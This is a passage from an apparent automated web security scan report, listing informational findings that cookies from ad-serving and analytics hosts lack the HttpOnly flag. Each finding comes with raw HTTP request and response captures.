Referer: http://www.diamondconsultants.com/publicsite/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: ad.doubleclick.net
Proxy-Connection: Keep-Alive
Cookie: test_cookie=CheckForPermission

Response

HTTP/1.1 200 OK
Content-Type: image/gif
Pragma: no-cache
Cache-Control: no-cache
X-Dclk-Inred-Response-Type: None
Content-Length: 43
Set-Cookie: id=c9e66a33100004f||t=1294752429|et=730|cs=d5sqmcrv; path=/; domain=.doubleclick.net; expires=Thu, 10 Jan 2013 13:27:09 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Mon, 10 Jan 2011 13:27:09 GMT
Date: Tue, 11 Jan 2011 13:27:09 GMT
Server: GFE/2.0
Expires: Tue, 11 Jan 2011 13:27:09 GMT

GIF89a.............!.......,...........L..;

11.35. http://ad.doubleclick.net/adj/wiredcom.dart/threatlevel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/wiredcom.dart/threatlevel

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adj/wiredcom.dart/threatlevel HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c9e66a33100004f||t=1294752429|et=730|cs=d5sqmcrv; L1527=1.1294622737145; test_cookie=CheckForPermission;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 844
Set-Cookie: id=c6fb6ac310000bc||t=1294802606|et=730|cs=8ndnuyeg; path=/; domain=.doubleclick.net; expires=Fri, 11 Jan 2013 03:23:26 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Tue, 11 Jan 2011 03:23:26 GMT
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 12 Jan 2011 03:23:26 GMT
Expires: Wed, 12 Jan 2011 03:23:26 GMT
Connection: close

document.write('<!-- BEGIN DIMESTORE TAG -->\n');

var projectid = 2621;
var playerwidth = 300;
var playerheight = 250;
//var clickurl = "http://ad.doubleclick.net/click%3Bh%3Dv8/3a8d/3/0/%2a/b%3B2347
...[SNIP]...

11.36. http://ad.doubleclick.net/clk

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /clk

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /clk;233079667;13533154;h?http://info.isilon.com/forms/simpleissmart?source=uk_register_text_simpleissmart HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c9e66a33100004f||t=1294752429|et=730|cs=d5sqmcrv; L1527=1.1294622737145; test_cookie=CheckForPermission;

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://info.isilon.com/forms/simpleissmart?source=uk_register_text_simpleissmart
Set-Cookie: id=c4ebaac31000066||t=1294802685|et=730|cs=3l8s5eo3; path=/; domain=.doubleclick.net; expires=Fri, 11 Jan 2013 03:24:45 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Tue, 11 Jan 2011 03:24:45 GMT
Date: Wed, 12 Jan 2011 03:24:45 GMT
Server: GFE/2.0
Content-Type: text/html
Connection: close


11.37. http://ad.doubleclick.net/jump/wiredcom.dart/threatlevel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /jump/wiredcom.dart/threatlevel

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jump/wiredcom.dart/threatlevel HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c9e66a33100004f||t=1294752429|et=730|cs=d5sqmcrv; L1527=1.1294622737145; test_cookie=CheckForPermission;

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://www.intel.com/consumer/products/processors/corei5.htm?dfaid=1&crtvid=39900309
Set-Cookie: id=c9e66a33100004f|1873234/1044713/14986|t=1294752429|et=730|cs=d5sqmcrv; path=/; domain=.doubleclick.net; expires=Thu, 10 Jan 2013 13:27:09 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Wed, 12 Jan 2011 03:23:22 GMT
Server: GFE/2.0
Content-Type: text/html
Connection: close


11.38. http://ad.insightexpressai.com/adserver/adServer.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.insightexpressai.com
Path:   /adserver/adServer.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /adserver/adServer.aspx?publisherID=338 HTTP/1.1
Host: ad.insightexpressai.com
Proxy-Connection: keep-alive
Referer: http://www.wired.com/threatlevel/2011/01/wikileaks-sunken-treasure/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Wed, 12 Jan 2011 03:04:01 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Set-Cookie: IXAICampaignCounter2203=0; domain=.insightexpressai.com; expires=Tue, 12-Jan-2016 03:04:02 GMT; path=/
Set-Cookie: IXAIControlCounter2203=0; domain=.insightexpressai.com; expires=Tue, 12-Jan-2016 03:04:02 GMT; path=/
Set-Cookie: IXAIBannerCounter170474=0; domain=.insightexpressai.com; expires=Tue, 12-Jan-2016 03:04:02 GMT; path=/
Set-Cookie: IXAIBanners2203=170474; domain=.insightexpressai.com; expires=Tue, 12-Jan-2016 03:04:02 GMT; path=/
P3P: CP="OTI DSP COR CUR ADMi DEVi TAI PSA PSD IVD CONi TELi OUR BUS STA"
Date: Wed, 12 Jan 2011 03:04:02 GMT
Connection: close
Content-Length: 9

//170474

11.39. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/572.479.tk.165x18/1294785946076317

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/572.479.tk.165x18/1294785946076317

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/572.479.tk.165x18/1294785946076317 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://www.yahoo.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Server: nginx/0.6.39
Date: Tue, 11 Jan 2011 22:45:46 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Fri, 11-Feb-2011 22:45:46 GMT; path=/
Set-Cookie: i_1=46:572:479:0:0:36939:1294785946:L; expires=Thu, 10-Feb-2011 22:45:46 GMT; path=/
Location: http://admedia.wsod.com/media/p.gif
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 0


11.40. http://b.scorecardresearch.com/b

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=2&c2=3000023&rn=2127270684&c7=http%3A%2F%2Fdownload.cnet.com%2F8301-2007_4-20027809-12.html%3Ftag%3Dmncol%3Btitle&c8=Android%20lands%20cloud%20security%20from%20Trend%20Micro%20%7C%&c9=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html&cv=2.2&cs=js HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://download.cnet.com/8301-2007_4-20027809-12.html?tag=mncol;title
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Wed, 12 Jan 2011 03:00:25 GMT
Connection: close
Set-Cookie: UID=1f00d615-24.143.206.88-1294170954; expires=Fri, 11-Jan-2013 03:00:25 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


11.41. http://bs.serving-sys.com/BurstingPipe/BannerRedirect.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/BannerRedirect.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BurstingPipe/BannerRedirect.asp HTTP/1.1
Host: bs.serving-sys.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: U=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G7030; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; A2=; B2=; u2=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G7030; E2=0a+r820wsG02WG820wsG09MY8y8ysF; C3=; u3=1; D3=;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 0
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: u2=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G703g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G703g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Wed, 12 Jan 2011 03:16:55 GMT
Connection: close


11.42. http://bs.serving-sys.com/BurstingPipe/BannerRedirect.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/BannerRedirect.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BurstingPipe/BannerRedirect.asp?FlightID=1901699&Page=&PluID=0&EyeblasterID=4165551&Pos=000000087871816&ord=[timestamp] HTTP/1.1
Host: bs.serving-sys.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: U=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G7030; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; A2=; B2=; u2=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G7030; E2=0a+r820wsG02WG820wsG09MY8y8ysF; C3=; u3=1; D3=;

Response

HTTP/1.1 302 Object moved
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 0
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Location: http://www.pctools.com/spyware-doctor-antivirus/?ref=display-cnet&utm_source=download.com&utm_medium=banner&utm_content=all&utm_campaign=US_SECTARG_sdav_300_03_11-09
Server: Microsoft-IIS/7.5
Set-Cookie: E2=0a+re3wUsI02WG820wsG09MY8y8ysF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G703g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G703g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Wed, 12 Jan 2011 03:16:53 GMT
Connection: close


11.43. http://bs.serving-sys.com/BurstingPipe/BannerSource.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/BannerSource.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BurstingPipe/BannerSource.asp?FlightID=1901699&Page=&PluID=0&EyeblasterID=4165551&Pos=000000087871816&ord=[timestamp] HTTP/1.1
Host: bs.serving-sys.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: U=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G7030; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; A2=; B2=; u2=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G7030; E2=0a+r820wsG02WG820wsG09MY8y8ysF; C3=; u3=1; D3=;

Response

HTTP/1.1 302 Object moved
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 0
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Location: http://ds.serving-sys.com/BurstingRes/Site-27742/Type-0/f4bbb00d-1a47-45b5-bf52-f968c23d96e3.jpg
Server: Microsoft-IIS/7.5
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: A2=fU+La5OV0a+r0000820wsI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B2=7gi30820wsI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C3=0uO9820wsI0000002_; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: D3=0uO9002P820wsI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: E2=0a+rg410sI02WG820wsG09MY8y8ysF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G703g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G703g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C_000000087871816=4165551
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Wed, 12 Jan 2011 03:17:26 GMT
Connection: close


11.44. http://bs.serving-sys.com/BurstingPipe/BannerSource.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/BannerSource.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BurstingPipe/BannerSource.asp?FlightID=1922091&Page=&PluID=0&Pos=8865\ HTTP/1.1
Host: bs.serving-sys.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: U=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G7030; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; A2=; B2=; u2=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G7030; E2=0a+r820wsG02WG820wsG09MY8y8ysF; C3=; u3=1; D3=;

Response

HTTP/1.1 302 Object moved
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 0
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Location: http://ds.serving-sys.com/BurstingRes/Site-281/Type-0/7b4b3e72-c3e8-4733-aa25-3c5dffe10972.gif
Server: Microsoft-IIS/7.5
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: A2=fUFGa5OV02WG0000820wsI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B2=7lgH0820wsI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C3=0uP4820wsI000w000_; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: D3=0uP402HA820wsI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: E2=0a+r820wsG02WGg410sI09MY8y8ysF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G703g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G703g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C_8865\=4164202
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Wed, 12 Jan 2011 03:17:41 GMT
Connection: close


11.45. http://bs.serving-sys.com/BurstingPipe/BannerSource.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/BannerSource.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BurstingPipe/BannerSource.asp HTTP/1.1
Host: bs.serving-sys.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: U=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G7030; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; A2=; B2=; u2=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G7030; E2=0a+r820wsG02WG820wsG09MY8y8ysF; C3=; u3=1; D3=;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 0
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: u2=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G703g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G703g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C_=BlankImage
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Wed, 12 Jan 2011 03:17:14 GMT
Connection: close


11.46. http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/BurstingInteractionsPipe.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BurstingPipe/BurstingInteractionsPipe.asp?interactionsStr=4164202%7E%7E0%5EebAdDuration%7E18%7E0%7E1%7E0%7E2%7E0%7E0%5EebRichFlashPlayed%7E0%7E0%7E1%7E0%7E2%7E0%7E0&OptOut=0&ebRandom=0.9409657982178032&flv=10.1103&wmpv=0&res=128 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.theregister.co.uk/2011/01/07/open_source_crypto_curbs/
Origin: http://www.theregister.co.uk
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: A2=; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B2=; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C3=; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: D3=; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=f7d1a9e2-ffff-4620-9a6f-d4ba2248bf353G9020; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=f7d1a9e2-ffff-4620-9a6f-d4ba2248bf353G9020; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Wed, 12 Jan 2011 03:00:24 GMT
Connection: close
Content-Length: 0


11.47. http://bs.serving-sys.com/BurstingPipe/adServer.bs

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=1922091&PluID=0&w=300&h=600&ord=3092481&ncu=http://ad.uk.doubleclick.net/click%3Bh%3Dv8/3a8a/3/0/%2a/f%3B232232804%3B0-0%3B1%3B13500656%3B4252-336/280%3B39182405/39200192/1%3B%3B%7Esscs%3D%3f HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.theregister.co.uk/2011/01/07/open_source_crypto_curbs/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; A2=gn3Ka4JO09MY00008y8ysFfU+La50V0a+r0000820wsG; B2=83xP08y8ysF7gi30820wsG; C3=0u3F8y8ysF0000040_0uO9820wsG0000002_; D3=0u3F00358y8ysF0uO9002P820wsG; E2=0a+r820wsG09MY8y8ysF; u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; u3=1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: A2=gn3Ka4JO09MY00008y8ysFfU+La50V0a+r0000820wsGfUFGa5OE02WG0000820wsI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B2=7lgH0820wsI83xP08y8ysF7gi30820wsG; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C3=0uP4820wsI000w000_0u3F8y8ysF0000040_0uO9820wsG0000002_; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: D3=0uP402HA820wsI0u3F00358y8ysF0uO9002P820wsG; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: E2=0a+r820wsG02WG820wsI09MY8y8ysF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Wed, 12 Jan 2011 03:00:25 GMT
Connection: close
Content-Length: 2868

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...

11.48. http://digg.com/submit

Summary

Severity:   Information
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /submit HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 03:34:26 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=1163899028811809024%3A154; expires=Thu, 13-Jan-2011 03:34:26 GMT; path=/; domain=digg.com
Set-Cookie: d=2d42bedfcbae53b8ee6f61a9c9010100cced8e8e45672361cf74370761950c78; expires=Mon, 11-Jan-2021 13:42:06 GMT; path=/; domain=.digg.com
X-Digg-Time: D=22051 10.2.130.26
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7384

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- Submit a link
</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics
...[SNIP]...

11.49. http://download.cnet.com/1770-20_4-0.html

Summary

